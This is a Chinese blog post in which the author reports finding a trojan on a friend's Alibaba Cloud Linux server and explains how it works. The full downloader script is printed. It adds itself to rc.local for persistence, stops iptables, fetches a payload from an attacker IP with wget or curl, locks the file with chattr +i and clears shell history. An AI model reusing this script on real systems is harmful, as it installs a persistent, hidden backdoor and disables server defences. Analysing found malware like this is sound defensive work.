一个木马下载脚本

帮一个朋友在阿里云Linux服务器上装软件，发现出奇的卡，终端上敲几个字就卡几十秒。ps -ef一看，发现两个可疑物：

/etc/tows/etc/towgets.sh

乘着不卡，cat /etc/tows，擦，很明显的木马。哎，做点什么不好，黑人有啥好玩的！

Anyway，把脚本拿出来给大家学习下。涉及到如下几个技术点：

• echo “sh /etc/towgets.sh &” >> /etc/rc.local： 开机自启动
• history -c : 清理脚本命令history，尽量防止被人发现
• chattr +i /etc/tows ： root也删不了哦，需要先chattr -i之后才能rm
• /etc/init.d/iptables stop ： 防止防火墙阻止自己下代码（木马实体）
• ps aux | grep “tows” | grep -v grep | awk ‘{print $2}’ 找tows有多少个，kill 防止启动多个实例

#!/bin/bash#Welcome like-minded friends to come to exchange.#We are a group of people who have a dream.#                by:Tyrant#                2015-02-12if [ "sh /etc/towgets.sh &" = "$(cat /etc/rc.local | grep /etc/towgets.sh | grep -v grep)" ]; then    echo ""else    echo "sh /etc/towgets.sh &" >> /etc/rc.local    echo "/etc/init.d/iptables stop">>/etc/rc.local    echo "nohup /etc/tows > /dev/null 2>&1 &">>/etc/rc.localfiwhile [ 1 ]; do    Centos_sshd_killn=$(ps aux | grep "/etc/tows" | grep -v grep | wc -l)    if [[ $Centos_sshd_killn -eq 0 ]]; then        if [ ! -f "/etc/tows" ]; then            if [ -f "/usr/bin/wget" ]; then                cp /usr/bin/wget .                chmod +x wget                #./wget -P . http://222.186.58.233:58961/tows                ./wget -P /etc/  http://222.186.58.233:58961/tows &> /dev/null            else                curl -o /etc/tows http://222.186.58.233:58961/tows            fi        fi        /etc/init.d/iptables stop        chmod +x /etc/tows        rm wget -rf        /etc/tows &        #./etc/tows &        chattr +i /etc/tows        history -c    elif [[ $Centos_sshd_killn -gt 1 ]]; then        for killed in $(ps aux | grep "tows" | grep -v grep | awk '{print $2}'); do            Centos_sshd_killn=$(($Centos_sshd_killn-1))            if [[ $Centos_sshd_killn -eq 1 ]]; then                continue            else                kill -9 $killed            fi        done    else        echo ""    fi    sleep 600done

脚本本身没啥。至于卡顿，应该是tows写得比较挫，没处理好资源利用导致。